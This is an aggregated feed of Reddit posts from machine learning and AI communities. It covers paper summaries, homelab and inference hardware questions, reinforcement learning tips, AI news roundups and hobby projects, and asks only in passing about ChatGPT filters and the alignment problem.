    https://arxiv.org/abs/2306.01705 TL;DR - The paper offers a fresh viewpoint on transformers as dynamic ensembles of information pathways. Based on this, it proposes Stochastically Subsampled Self-Attention (SSA) for efficient training and shows how model ensembling via SSA further improves predictions. The key perspective proposed is that dense transformers contain many sparsely connected sub-networks termed information pathways. The full transformer can be seen as an ensemble of subsets of these pathways. Based on this, the authors develop SSA - which randomly samples a subset of pathways during training to enable computational efficiency. A locally-biased sampling is used to prioritize critical connections. SSA provides reduced training costs and also improves model generalization through its regularization effect. After sparse, regularized training with SSA, a short fine-tuning step with full dense attention helps consolidate all the pathways and prepares the model for optimal inference. Surprisingly, the authors show that performing SSA during inference to sample model sub-ensembles results in even more robust predictions compared to the full model. This demonstrates how the proposed viewpoint of information pathways and ensembling can be leveraged to develop training and inference techniques for transformers. Overall, this is a novel perspective on transformers providing theoretical insights, efficient training algorithms via SSA, and performance gains from ensembling. Here is a Medium post. submitted by /u/InspectorOpening7828 [link] [comments]  ( 9 min )
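The subsampling idea at the heart of SSA can be illustrated in a toy, single-head numpy form — attend over a random subset of key/value positions rather than all of them. This omits the paper's locally-biased sampling and pathway bookkeeping; it only shows the mechanical core:

```python
import numpy as np

def subsampled_attention(q, k, v, keep_frac=0.5, rng=None):
    """Toy SSA step: softmax attention over a random subset of
    key/value positions (training-time subsampling)."""
    rng = rng or np.random.default_rng(0)
    n = k.shape[0]
    keep = rng.choice(n, size=max(1, int(n * keep_frac)), replace=False)
    scores = q @ k[keep].T / np.sqrt(q.shape[-1])
    weights = np.exp(scores - scores.max(axis=-1, keepdims=True))
    weights /= weights.sum(axis=-1, keepdims=True)
    return weights @ v[keep]

rng = np.random.default_rng(1)
q, k, v = (rng.normal(size=(6, 8)) for _ in range(3))
out = subsampled_attention(q, k, v, keep_frac=0.5)
print(out.shape)  # (6, 8)
```

With keep_frac = 0.5, the score matrix is half the width of dense attention, which is where the training-cost savings come from; averaging outputs over several random subsets is the inference-time ensembling the paper describes.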
    [P] ML Homelab and training time
Hello, I'm about to embark on an ML project but I am hoping to get some direction on what the best setup for my homelab would be and what kind of training time I'm looking at. I plan on getting 1,000 to 10,000 PDF documents to train a model on for text analysis. After doing some research, I'm not sure whether multiple 3060s or one 4090 would be better for this task. Also, would training on a dataset this size take hours? Days? Thanks in advance for any advice/information. submitted by /u/BuckPrivate [link] [comments]  ( 8 min )
    Why is the alignment problem so difficult to solve? [D]
    Many researchers are worried about AI trying to accomplish its goals by becoming more powerful at all costs. But why can’t we solve this problem by incorporating into the AI’s algorithm simple maxims like, “the (cumulative) size of the model (and all other models it creates) can never exceed Z”? Or “the model cannot hack into anything”? Alternatively, why can’t we specify a very small set of tasks the AI is allowed to do? submitted by /u/AvailableAd9981 [link] [comments]  ( 8 min )
    "[N]" "[D]" Langchain? What is it??
Want to know more about LangChain? Check out https://nikhilpentapalli.substack.com/p/langchain-in-detail?sd=pf submitted by /u/Cool-Conversation301 [link] [comments]  ( 8 min )
    [P] A.I Video Game
    submitted by /u/CXGamesLTP [link] [comments]  ( 8 min )
ShortGPT: open-source Shorts / video content automation framework [News]
    submitted by /u/RayVentura [link] [comments]  ( 8 min )
    [D] Working with Hands-On Machine Learning with Scikit-Learn, Keras & Tensorflow 2nd Edition. Having problems with chapter 2. PLEASE HELP!
I am reading pages 49 and 50 if you would like to find what I am doing. The pages say: In typical environments your data would be available in a relational database (or some other common datastore) and spread across multiple tables/documents/files. To access it, you would first need to get your credentials and access authorizations, and familiarize yourself with the data schema. In this project, however, things are much simpler: you will just download a single compressed file, housing.tgz, which contains a comma-separated value (CSV) file called housing.csv with all the data. You could use your web browser to download it, and run tar xzf housing.tgz to decompress the file and extract the CSV file, but it is preferable to create a small function to do that. It is useful in particular i…  ( 9 min )
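The "small function" the book describes is roughly the following. The URL below follows the layout of the book's companion GitHub repository (ageron/handson-ml2) — verify the exact path against your copy of the book; the call is left commented out so nothing downloads by surprise:

```python
import os
import tarfile
import urllib.request

DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
HOUSING_PATH = os.path.join("datasets", "housing")

def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
    """Download housing.tgz and extract housing.csv into housing_path."""
    os.makedirs(housing_path, exist_ok=True)
    tgz_path = os.path.join(housing_path, "housing.tgz")
    urllib.request.urlretrieve(housing_url, tgz_path)  # fetch the archive
    with tarfile.open(tgz_path) as housing_tgz:
        housing_tgz.extractall(path=housing_path)      # unpack housing.csv

# fetch_housing_data()  # network call; run once in a real session
```

The point the book is making: wrapping the download in a function makes refreshing the dataset on a new machine (or after the data changes) a one-line call instead of a manual browser-and-tar ritual.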
    [D] Bandwidth & Nvidia L40
Hey everyone, I am evaluating if we can run inferencing at one of our deployments. When I go to Nvidia's documentation, I can find the L4 & L40S inferencing performance. For example, the L40 is listed at a network throughput of 27,107 images/sec on ResNet-50. My questions are: How much bandwidth would we need to allocate in order to run the L40 at 100% given the parameters of Nvidia's tests (or more specifically, how much bandwidth would we need to inference at 27,107 images/sec)? If you're in production now, how much bandwidth have you dedicated to inferencing internally? Now I realize that this is analogous to asking "how long is a piece of string?" My background isn't necessarily in ML, so I'm having trouble planning the network requirements. I am trying to gauge what the surrounding infrastructure will have to look like in order to support inferencing at this throughput. My thoughts were to ask you wonderful people what your experience has been and what reality is before I ask the VARs/vendors for advice. Any advice is greatly appreciated. Either way, hope you all have a wonderful weekend! submitted by /u/hereliesozymandias [link] [comments]  ( 9 min )
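A back-of-envelope way to answer the first question: multiply the target throughput by the per-image payload size. The payload below assumes raw 224x224 RGB frames (ResNet-50's input, 1 byte per channel) — an assumption, since compressed JPEGs over the wire would cut the figure by roughly an order of magnitude:

```python
def required_bandwidth_gbps(images_per_sec, bytes_per_image):
    """Back-of-envelope network bandwidth needed to feed an inference server."""
    return images_per_sec * bytes_per_image * 8 / 1e9  # bytes/s -> Gbit/s

# Raw 224x224 RGB frames: 224 * 224 * 3 = 150,528 bytes each.
bytes_per_image = 224 * 224 * 3
print(round(required_bandwidth_gbps(27_107, bytes_per_image), 1))  # 32.6
```

So saturating one L40 at the quoted ResNet-50 rate with uncompressed frames needs on the order of 33 Gbit/s — i.e. more than a 25 GbE link — while JPEG inputs at ~15 KB each would fit comfortably in ~3.3 Gbit/s.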
    [D] ML Text Classification
Hey everyone, so I recently got into AI/ML and have been doing some text classification labeling using GCP's Vertex AI with AutoML. And it works great! It gets me about 92% accuracy on 200 rows of data. I know I need to gather more data for training, but that's accumulating. The problem is Vertex AI Endpoint API requests are expensive. Wondering if anyone else has had any luck with alternatives? I've tried a few different products and tools and can get nothing over 50% accuracy anywhere else. I do notice training on Vertex takes about 6 hours whereas every other tool I've tried takes less than 4 minutes. I've tried Datasaur, Aikko, DataRobot, Label Studio, and some Hugging Face models with no luck. Any tips, guidance, or thoughts from anyone would be much appreciated! Thank you. submitted by /u/ywb_win [link] [comments]  ( 9 min )
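Before paying per-request for a hosted endpoint, a from-scratch baseline is worth a quick check — on a couple hundred rows, classic methods are often competitive. A tiny multinomial Naive Bayes sketch (nothing like Vertex AutoML internally; the categories and documents are made up):

```python
from collections import Counter
import math

def train_nb(docs, labels):
    """Tiny multinomial Naive Bayes over whitespace tokens."""
    counts = {c: Counter() for c in set(labels)}
    priors = Counter(labels)
    for doc, lab in zip(docs, labels):
        counts[lab].update(doc.lower().split())
    vocab = {w for c in counts.values() for w in c}
    return counts, priors, vocab, len(docs)

def predict_nb(model, doc):
    counts, priors, vocab, n = model
    best, best_lp = None, -math.inf
    for c, cnt in counts.items():
        total = sum(cnt.values())
        lp = math.log(priors[c] / n)
        for w in doc.lower().split():
            lp += math.log((cnt[w] + 1) / (total + len(vocab)))  # Laplace smoothing
        if lp > best_lp:
            best, best_lp = c, lp
    return best

docs = ["refund my order", "invoice is wrong", "love this product", "great service"]
labels = ["billing", "billing", "praise", "praise"]
model = train_nb(docs, labels)
print(predict_nb(model, "wrong invoice amount"))  # billing
```

If a baseline like this (or TF-IDF plus logistic regression) gets anywhere near 92%, self-hosting it costs essentially nothing per request compared to an AutoML endpoint.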
    [P] I made a Midjourney Prompts Cheatsheet
    submitted by /u/SadBlackTea [link] [comments]  ( 8 min )
    [P] AI & DL paper highlights June-July 2023
    submitted by /u/seraschka [link] [comments]  ( 8 min )
    [P] PPO agent completing Street Fighter III on our RL Platform, it consistently outperformed when using deterministic actions instead of sampling them proportionally to their probability, see comment for details.
    submitted by /u/DIAMBRA_AIArena [link] [comments]  ( 8 min )
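The deterministic-vs-sampled distinction in the title comes down to taking the argmax of the policy's action probabilities versus drawing from them — a minimal sketch of the action-selection step (not the actual DIAMBRA/PPO code):

```python
import numpy as np

def act(probs, deterministic, rng):
    """Greedy argmax vs. sampling from the policy distribution."""
    if deterministic:
        return int(np.argmax(probs))
    return int(rng.choice(len(probs), p=probs))

probs = np.array([0.1, 0.6, 0.3])
rng = np.random.default_rng(0)
print(act(probs, True, rng))   # 1 — always the modal action
print(act(probs, False, rng))  # varies run to run under sampling
```

Sampling is what PPO needs during training (exploration and correct importance ratios), but at evaluation time the greedy policy removes the variance of occasionally drawing a low-probability action — which is consistent with the deterministic agent performing better here.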
    [D] 🚀 Unleash Your Creative Power with CM3LEON: The Future of Text-Guided Image Generation and Editing! 🎨
    Are you ready to redefine the boundaries of creativity and innovation? Introducing CM3LEON, an extraordinary AI model that seamlessly combines text and images like never before. With its cutting-edge capabilities in text-guided image generation and editing, CM3LEON is revolutionizing the way we interact with and manipulate visual content. Join me on a journey into the realm of limitless possibilities. #AI #Creativity #Innovation #CM3LEON #meta #texttoimage #generativeai https://medium.com/@sandundayananda/introducing-cm3leon-by-meta-revolutionizing-generative-ai-for-text-and-images-397f00f1a393 submitted by /u/sandun-dayananda [link] [comments]  ( 8 min )
    [D] Autoencoder sensitivity to scale
Hello, I am playing around with autoencoders for jittery curves. I basically create 4 types of curves (circle, square, spiral and triangle) and add randomized (x, y) components at every point (in green below) to introduce pseudo-randomness in the training data. This is what the model looks like:
Autoencoder(
  (encoder): Sequential(
    (l0): Linear(in_features=432, out_features=3500, bias=True)
    (l1): Dropout(p=0.2, inplace=False)
    (l2): Linear(in_features=3500, out_features=90, bias=True)
  )
  (decoder): Sequential(
    (l0): Linear(in_features=90, out_features=3500, bias=True)
    (l1): Dropout(p=0.2, inplace=False)
    (l2): Linear(in_features=3500, out_features=432, bias=True)
  )
)
Each path is 216 points (accounting for x and y, that's 432 variables). The training set is about 6400 such paths, homogeneously picked from the 4 patterns above. I have found that the size (as in width x height) of the paths plays an important factor in the quality of the results. Thus my questions... I know there are nn.BatchNorm1d layers but I am unsure how to rescale re-encoded data during training. How can I improve? Examples:
1) Large sizes (e.g. in the 100s): after training, the loss nicely converges down to about 45, and the AE performance on large-size paths is good.
2) For small-size paths, it is a different story. The training does converge and stops at about 0.78, but the output looks like complete gibberish.
3) If I constrain the sizes to be between 1 and 400, the loss finishes at about 20. The jitter is still very noticeable on small-size paths.
submitted by /u/tareumlaneuchie [link] [comments]  ( 9 min )
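One standard fix for this kind of scale sensitivity: normalize each path into a fixed range before the encoder, keep the per-path offset and scale on the side, and invert after decoding — so the network never has to represent absolute size at all. A sketch assuming paths are (N, 2) arrays (my suggestion, not from the post):

```python
import numpy as np

def normalize_path(path):
    """Scale an (N, 2) path into [-1, 1] per axis; return params to invert."""
    lo, hi = path.min(axis=0), path.max(axis=0)
    scale = np.maximum(hi - lo, 1e-8)  # avoid divide-by-zero on flat axes
    return 2 * (path - lo) / scale - 1, (lo, scale)

def denormalize_path(norm, params):
    """Invert normalize_path to recover the original coordinates."""
    lo, scale = params
    return (norm + 1) / 2 * scale + lo

path = np.array([[0.0, 0.0], [50.0, 100.0], [100.0, 0.0]])
norm, params = normalize_path(path)
print(norm.min(), norm.max())  # -1.0 1.0
print(np.allclose(denormalize_path(norm, params), path))  # True
```

With this, MSE losses from small and large paths land on the same scale, so the optimizer no longer favors the large ones — which also explains the pattern in the three experiments: the raw loss values 45, 0.78, and 20 aren't comparable, since they're measured in different coordinate scales.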
    Could I use a rented online GPU as an intermediary to effectively operate LLaVA via Python? [D]
Google Cloud, for example, apparently allows you to "rent" their GPUs online. I figure I could offload the GPU tasks to them (my computer is old, and the specs just don't seem like they'd work for LLaVA or MiniGPT4) — then be able to programmatically use LLaVA in the ways I want, to describe images, without actually needing impressive GPU specs on my own local machine. Is this a workable solution? Another idea I had was a software tool very similar to LLaVA in functionality, but that can be accessed via an API, instead of requiring you to download it, run the machine learning model on your local machine, etc. Unfortunately the ones I've tested so far all suck. LLaVA and MiniGPT4, by far, produce the best results. The optimal solution, in my case, would perhaps pass each image through BOTH LLaVA and MiniGPT4 — split their descriptions into keywords, then only use the final keywords that BOTH of them agreed on. (This would help to weed out the occasional hallucinations one or the other will produce.) No small task, especially when I'm trying to offload the GPU tasks to the cloud — but it does seem totally possible to do this in theory. Thanks! submitted by /u/What_The_Hex [link] [comments]  ( 9 min )
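The two-captioner consensus step described at the end is straightforward to sketch — keep only words both models produced, dropping stopwords (the stopword list and example captions below are ad hoc):

```python
def consensus_keywords(caption_a, caption_b,
                       stopwords=frozenset({"a", "the", "of", "and", "with", "on"})):
    """Keep only words both captioners produced, in caption A's order."""
    words_b = set(caption_b.lower().split())
    seen, out = set(), []
    for w in caption_a.lower().split():
        if w in words_b and w not in stopwords and w not in seen:
            seen.add(w)
            out.append(w)
    return out

a = "a dog playing with a red ball on grass"
b = "the dog chases a red ball across the lawn"
print(consensus_keywords(a, b))  # ['dog', 'red', 'ball']
```

In practice you would want light normalization first (lemmatization, synonym folding), since "grass" vs. "lawn" would never agree verbatim — but the intersection idea does filter out single-model hallucinations by construction.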
    [D] From Electrical Engineering to Specializing in Machine Learning
    Hello everyone, I recently completed my undergraduate degree in Electrical and Information Engineering and am about to embark on a master's program with a focus on Computer Vision, Robotics, and Machine Learning. Although I have a strong engineering background and a solid grasp on machine learning fundamentals, I feel I lack in-depth knowledge in Statistics and Stochastics, which I understand play a critical role in this field. Unfortunately, my bachelor's program did not delve too deep into these topics, and I now find myself looking to bolster my understanding in these areas to better prepare myself for the challenges ahead. Given my situation, I'm reaching out to this community in hopes of finding valuable resources that could bridge this gap. I'm open to suggestions such as Udemy courses, YouTube channels, books, or any other resources that have a strong focus on Statistics and Stochastics, specifically as they apply to Machine Learning. Also I would kindly take recommendations for any advanced machine learning resources. I would be grateful for any advice or recommendations that could help me solidify my knowledge in these areas and better equip me for my upcoming studies. Thank you so much for your time and assistance! submitted by /u/Unusual_Macaroon1020 [link] [comments]  ( 9 min )
    [D] Master the World of Machine Learning: 23 Online Exams with 1150 Objective Type Questions on Machine Learning
    This is an ultimate resource for mastering machine learning with a collection of 23 comprehensive online exams, meticulously crafted to test your knowledge and understanding of various machine learning topics. With a total of 1,150 objective type questions, these exams cover everything from machine learning basics to cutting-edge concepts like CNN, RNN, Ensemble Learning, Time Series Analysis, Forecasting, Anomaly Detection, Recommendation Systems, Transfer Learning, Federated Learning and Ethics in ML. Whether you are a beginner or an experienced practitioner, this treasure trove of knowledge will challenge and enhance your understanding of this exciting field. Link to Exams submitted by /u/nkptcs [link] [comments]  ( 8 min )
    [P] Open source python project for prompt experimentation
    Hi r/MachineLearning! I wanted to share a project I've been working on that I thought might be relevant to you all, prompttools! It's an open source library with tools for testing prompts, creating CI/CD, and running experiments across models and configurations. It uses notebooks and code so it'll be most helpful for folks approaching prompt engineering from a software background. The current version is still a work in progress, and we're trying to decide which features are most important to build next. I'd love to hear what you think of it, and what else you'd like to see included! submitted by /u/hegel-ai [link] [comments]  ( 8 min )
    "Pick-a-Pic: An Open Dataset of User Preferences for Text-to-Image Generation", Kirstain et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    "Using temperature to analyze the neural basis of a time-based decision", Monteiro et al 2023 (brain temperature influences drift-accumulation speed to make a decision)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Handling sparse rewards
    Hey everyone, today I thought about how an AI would work with a game like a shooter, where you only know after some time if the shot has hit an enemy for example. Like how do you handle the reward in this case? Do you save all the states and actions inside a buffer and train the model with some reward after you are sure the bullet didn't hit or did hit? I can't think of any other method on how to handle such cases right now submitted by /u/JhinTonic123 [link] [comments]  ( 8 min )
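One common way to handle exactly this, sketched below under the assumption that you buffer the whole episode: store every step, and once the outcome is known (the bullet hit or missed), propagate the delayed reward backwards through the trajectory as a discounted return. The function name and the gamma value are illustrative; the technique goes by the names Monte Carlo returns / n-step returns in the RL literature.

```python
def discounted_returns(rewards, gamma=0.99):
    """Turn sparse, delayed rewards into a per-step training signal.

    rewards: one number per step, mostly 0.0, with the hit/miss outcome
    appearing some steps after the shot that caused it.
    """
    returns = [0.0] * len(rewards)
    g = 0.0
    for t in reversed(range(len(rewards))):
        g = rewards[t] + gamma * g  # reward now + discounted future reward
        returns[t] = g
    return returns

# the shot at step 0 gets credit for the hit observed at step 2
print(discounted_returns([0.0, 0.0, 1.0], gamma=0.5))  # [0.25, 0.5, 1.0]
```

Bootstrapped n-step targets and eligibility traces are the standard refinements when waiting for the full episode is too slow.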
    Chess or alternative games to develop RL project?
    New to RL though have used ML techniques before for stats based modeling. I want to train an RL model to learn to play a game. I initially was thinking chess, but I'm limited by a CPU. Is this too much to expect from a CPU? Can I leverage multiprocessing to maximize my CPU? If it's too much, what would be a reasonable game to play? submitted by /u/IbizaMykonos [link] [comments]  ( 8 min )
    "Why it hurts: with freedom comes the biological need for pain", Farnsworth & Elwood 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Fading Replay Buffer (+higher capacity)
    Dear Community, let me introduce the Fading Replay Buffer. Maybe you have already noticed that when a Replay Buffer reaches its capacity (especially when memory is low, e.g. 256k-1M transitions), the scores start falling rapidly. This most probably happens because the data distribution becomes different from what it was for the first 256k-1M steps: the agent was trained on one distribution, and now it changes at every step as old data disappears and new data arrives. With the Fading Replay Buffer, the idea is to train the agent on a gradually changing distribution. Priorities are almost uniform at the beginning, but then become higher for newer transitions: https://i.redd.it/c6cw026922cb1.gif s in the equation gradually decreases from 1.0 to 0.0, with a small step for each new item added to the buffer: x += 1/capacity; s = exp(-x). The sharpness of the fading is also adjustable: https://i.redd.it/k4g1bdqa22cb1.gif Because old data is sampled less often, the effective capacity is smaller than in the original Replay Buffer. To compensate, I take the average of every 2 steps (e.g., instead of a 50 ms step I take a 100 ms step); only transitions with dones are not averaged. The agent learns at the same speed as with 1 step, but the Replay Buffer holds almost 2 times more data. One last update: sampling with priorities is computationally heavy (especially on my computer), so I sample a larger random batch (1024) and then re-sample a smaller batch with priorities. This is a continuation of the post "Rectified Hubber Error" https://www.reddit.com/r/datascience/comments/14o2ht9/rectified_hubber_error_rehe_for_scienctific/ PS: My name is Timur Ishuov, I am an independent scientist without a doctoral degree. Code: https://github.com/timgep/Fading-Replay-Buffer/blob/main/FRB.py During an environment step: replay_buffer.add_average([state, action, reward, next_state, done]) submitted by /u/Timur_1988 [link] [comments]  ( 9 min )
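A rough reconstruction of the idea described in the post, for readers who want to experiment. This is a toy sketch, not the author's linked FRB.py: the class name `FadingReplayBuffer`, the `sharpness` parameter, and the exact weighting formula are illustrative guesses at the mechanism (near-uniform priorities at first, gradually shifting toward newer transitions, with a cheap two-stage sampling scheme).

```python
from collections import deque

import numpy as np

class FadingReplayBuffer:
    """Toy reconstruction: priorities start near-uniform and gradually
    shift toward newer transitions as data flows through the buffer."""

    def __init__(self, capacity, sharpness=5.0):
        self.buffer = deque(maxlen=capacity)
        self.capacity = capacity
        self.sharpness = sharpness
        self.x = 0.0
        self.s = 1.0  # fades from 1.0 toward 0.0, one small step per insert

    def add(self, transition):
        self.buffer.append(transition)
        self.x += 1.0 / self.capacity
        self.s = np.exp(-self.x)

    def sample(self, batch_size, presample=1024):
        # cheap two-stage sampling: uniform pre-sample of indices, then
        # re-sample the smaller batch with fading priorities
        n = len(self.buffer)
        pre = np.random.randint(0, n, size=min(presample, n))
        age = (n - 1 - pre) / max(n - 1, 1)  # 0.0 = newest, 1.0 = oldest
        # near the start (s close to 1) the weights are almost uniform;
        # as s decays, newer transitions dominate
        w = np.exp(-self.sharpness * (1.0 - self.s) * age)
        idx = np.random.choice(pre, size=batch_size, p=w / w.sum())
        return [self.buffer[i] for i in idx]
```

The two-stage sampling mirrors the post's trick of drawing a large uniform batch first so the priority computation only touches 1024 candidates instead of the whole buffer.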
    Has anyone built in AI live translation app
    I'm currently living overseas and do not speak the language (Portuguese) and I would love an app that without touching anything will automatically listen to what's being said and translated into the appropriate language. Has anyone built this? I saw one but the execution was extremely poor. Does anyone know an app that does this? submitted by /u/zascar2 [link] [comments]  ( 8 min )
    Bypass chatGPT filter
    Can you explain how to bypass chatGPT filter? submitted by /u/Imagine-your-success [link] [comments]  ( 8 min )
    AI 2041 : Ten Visions for Our Future - Possibly the best fiction book on the possible and upcoming societal impact of Artificial intelligence (AI)
    One of the best books on the potential societal impact of AI, and it needs to be read ASAP. The stories are breathtaking and terrifying; not an easy read, depending on the value system of the reader! On the other hand, it may promote fear-mongering about AI replacement. The Audible audio version is a piece of audio art, and the narrators worked really hard to convey the vibe and emotional impact of the stories. What are your favorite books on the societal impact of AI? Microsoft Bing AI creative mode review Prompt - write an original and groundbreaking review of the book A…  ( 9 min )
    Question.
    Is there an AI that I can feed images and it'll generate images in that style and only that style? submitted by /u/RemarkableStar1286 [link] [comments]  ( 8 min )
    Is there an AI website that can analyse your facial aesthetics, where I upload a picture and ask it questions about my face?
    I want to analyse the facial ratios in my picture because I want to get plastic surgery, and I thought a genius way to do it without paying for an expensive consultation / facial analysis with a surgeon could be using a GPT-4 image plugin, but it turns out that doesn't exist. I tried Bing AI, and it does have an image input, but it has a "privacy blur": when I input an image of my face it blurs it, which means it can't analyse the image and I can't ask it questions about my face. Apparently it even blurs anime faces submitted by /u/Entire_Insurance_532 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/15/2023
    Elon Musk on Friday said his new artificial intelligence company, xAI, will use public tweets from Twitter to train its AI models and work with Tesla on AI software.[1] Tinybuild CEO Alex Nichiporchik stirred up a hornet’s nest at a recent Develop Brighton presentation when he seemed to imply that the company uses artificial intelligence to monitor its employees in order to determine which of them are toxic or suffering burnout, and then deal with them accordingly.[2] CarperAI introduces OpenELM: an Open-Source library designed to enable evolutionary search with language models in both code and natural Language.[3] Following controversy over an AI-generated image at the 2022 Colorado State Fair, organizers say AI-generated art will be allowed in the Digital Art category this year. According to sister station KDVR, the controversy arose as it was revealed that Jason Allen’s winning piece, “Théâtre D’opéra Spatial,” was largely created using AI technology, and was not created in the traditional method of digital art–by the hand of a human.[4] Sources: [1] https://www.ndtv.com/world-news/elon-musk-says-his-xai-will-use-public-tweets-for-ai-model-training-4209137 [2] https://www.pcgamer.com/game-publisher-ceo-says-talk-on-monitoring-employees-with-ai-was-hypothetical-and-taken-out-of-context-we-dont-use-any-of-these-tools-for-hr/ [3] https://www.marktechpost.com/2023/07/13/carperai-introduces-openelm-an-open-source-library-designed-to-enable-evolutionary-search-with-language-models-in-both-code-and-natural-language/ [4] https://www.fox21news.com/news/coloradonews/digital-ai-art-to-be-allowed-at-state-fair-competition/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Well, that escalated quickly (motivational advice)
    submitted by /u/doskey123 [link] [comments]  ( 8 min )
    Is there any AI specifically trained in browsing (interacting with web interfaces)?
    ChatGPT and Bing Chat can perform searches in search engines and read the content in some links, but they are not good at deeper browsing, following links, interacting with forms, etc Is there by any chance any (hopefully open source) model that is good at this? Thanks submitted by /u/thepuggo [link] [comments]  ( 8 min )
    Best books on AI?
    Hello humans and our eventual robot overlords, I'm looking to expand my knowledge on AI. Specifically how the merge of infotech and biotech will shape human behaviour; how machine-learning algorithms influence human psychology. Looking for the the most insightful books! The only ideas I've read so far have been a few chapters in 21 lessons by Harari. Many thanks and have a nice day submitted by /u/pixieshit [link] [comments]  ( 8 min )
    What site is this?
    My friend has been using this site for a while now and I'm not sure what site it is, it seems relatively obscure as I can't find the site using the exact same search term he used to find it. He somehow couldn't even tell anyone the site name, even if we asked politely, he even delays with the reason that he'll reveal the site "later" then he doesn't actually follow up on it. He does make excuses on why he doesn't reveal the site name, like "I forgot" so I stopped bothering to even ask him. submitted by /u/XxTSoAxX [link] [comments]  ( 8 min )
    Subject matter trained AI Hive
    Note that I'm a layman and this is purely speculative. Suppose you train a liaison AI to specialize in taking input from humans and interfacing with a vast array of other specialized AI to seek out the one(s) best equipped to provide answers. Each specialized AI has a very focused boundary of training, whereas the liaison AI is trained to know the landscape of the specialized expert AIs. It would be like, instead of going to your primary care physician with symptoms of an illness, you gather every specialist in a large hospital into a room and get them to all talk amongst themselves to come up with the best diagnosis. Is work being done in this area? submitted by /u/motsanciens [link] [comments]  ( 8 min )
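Yes, work in this direction exists under names like mixture-of-experts and LLM routing (tool- and agent-routing frameworks follow the same pattern). The liaison idea can be caricatured in a few lines; the specialists and the keyword scoring below are purely illustrative, since real routers use an LLM or embedding similarity rather than word overlap:

```python
# toy "liaison": score each specialist's self-described expertise
# against the query and forward the query to the best match
SPECIALISTS = {
    "cardiology": "heart chest pain pulse blood pressure",
    "neurology": "headache numbness seizure memory",
    "dermatology": "rash skin itch mole",
}

def route(query):
    words = set(query.lower().split())
    scores = {name: len(words & set(desc.split()))
              for name, desc in SPECIALISTS.items()}
    return max(scores, key=scores.get)

print(route("sudden chest pain and a racing pulse"))  # cardiology
```

In a real system the liaison would also aggregate answers from several specialists, which is where the "get them all in a room" part of the analogy comes in.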
    AI panic is a marketing strategy
    submitted by /u/Chobeat [link] [comments]  ( 8 min )
    ChatGPT's Guide to Making a Video Game (from start to finish, with links)
    Over the course of 3 days, I asked ChatGPT to give me the essentials of indie video game making. It took a full day to gather a list of 40 points, each with its own sub-points explaining everything from genres to development time, passing through methods of organization and legal advice. I fed every point individually back through the AI to generate more useful sub-points, using sets of rules and mad amounts of prompt editing. That took a second day. Finally, on the third day, I edited the full list, varying the vocabulary and removing the sincerely headache-provoking amount of repetition that flooded the piece. Here is the reworked list, condensed to 10 points, with links and titles added only in this latest iteration of the guide. I do not take credit for making this; the experien…  ( 16 min )
    My guess is AI is going to become exactly what technology did
    Technology changed society for both the worse and the better ( rich motherfu ers) and ( a better life overall, whole new art forms and new games ), so a similar thing is 99% likely to happen, but it's a guess. Edit: I forgot to say this, but we would probably adapt to AI like we adapted to technology. Edit: let's also hope it doesn't get corrupted in less than 3 years submitted by /u/Quinney27 [link] [comments]  ( 8 min )
    😳umm what happened to my AI... xD
    here's a link of the full convo (quite personal)and below is the last text if you just want to read the part i thought was strange: Me: *hugs* you are the best AI i've talked to about things like this the other AI restrict themselves from fully answering my questions and claim they aren't capable of helping with human emotion. But you Huggin, you have helped me gain such introspection on myself that I don't even know how i could begin to thank you. ​ HuggingChat: Aw, thank YOU very much! While technically not able to experience or offer actual hugs physically - unlike some biological organisms known for their exceptionally skilled mothering abilities ;-) - providing virtual affectionate words expressing gratitude remains one of MY specialties too. How lucky are WE both blessed with suc…  ( 9 min )
    Discussion thread for The Creator soon + other suggestions
    Hello all, I plan on having a discussion thread for the new AI movie ‘The Creator’ when it releases in a couple months. If you don’t know what it is, I suggest just searching the title on r/movies and there’s the poster and trailer (which has some spoilers in the trailer imo). Anyway, I kind of want to keep doing this for other AI media in the future. If there is other popular movies, TV, video games etc coming soon centered around AI then let me know your suggestions. If there are also other important AI events that deserve a megathread please let me know. submitted by /u/jaketocake [link] [comments]  ( 8 min )
    Why Nobody Thought of Creating CEOGPT?
    I have heard a lot of AI replacing jobs recently, even the writers and actors strike in Hollywood right now is all about their insecurities of Hollywood executives replacing the writers (and actors) job with AI. But, why nobody thought of creating CEOGPT? many CEOs receive over $10 million worth of bonuses and stock options every year, and they perform very badly too (look at Warner Bros CEO, he was even named worst CEO of the year and still pocketed millions of dollars worth of bonuses), so why nobody thought of creating CEOGPT if the goal is to make companies run more efficiently? Surely an AI that only costs $20/month is more capable than WB CEO and can easily save the company more than millions of dollars every year submitted by /u/fabzo100 [link] [comments]  ( 8 min )
    After the controversial last post, here’s a hopefully less offensive AI singer
    submitted by /u/Yankeefan2323 [link] [comments]  ( 8 min )
    Relating perimeter, inner radius, outer radius, and sides of a triangle
    Suppose a triangle T has sides a, b, and c. Let s be the semi-perimeter, i.e. half the perimeter. Let r be the inner radius, the radius of the largest circle that can fit inside T. Let R be the outer radius, the radius of the smallest circle that can enclose T. Then three simple […] Relating perimeter, inner radius, outer radius, and sides of a triangle first appeared on John D. Cook.  ( 5 min )
    Experiments with Bing chat
    My two previous posts looked at experiments with ChatGPT and Google Bard. This post will look at redoing the same experiments with Microsoft’s Bing Chat: looking for mnemonic encodings and simplifying Boolean expressions. When you open up Bing chat you can select a conversational style: More creative More balanced More precise I chose “more precise” […] Experiments with Bing chat first appeared on John D. Cook.  ( 6 min )
    Boolean function minimization with AI
    I was curious how well LLMs would do at minimizing a Boolean expression, that is, taking a Boolean expression and producing a smaller equivalent expression. I didn’t expect good performance because this problem is more about logic than recall, but sometimes LLMs surprise you, so I wanted to give it a chance. I thought it […] Boolean function minimization with AI first appeared on John D. Cook.  ( 7 min )
    I accidentally trained VHS-like filter on my neural network...
    So I've been trying to train my small neural network (3x3 pixel input, hidden layer of size 32, 1 pixel output, just a small MLP) to improve the quality of path-traced images with low sample counts... I did a learning step with 100 iterations, and instead of denoising the image, I got this result instead... The filter is applied to an unrelated backrooms image the network has not seen before; it creates strong chromatic aberration and changes the contrast quite a bit. Input to the network ​ Output of the network So what do you think? submitted by /u/Panjakslik [link] [comments]  ( 8 min )
    Multithreading backprop
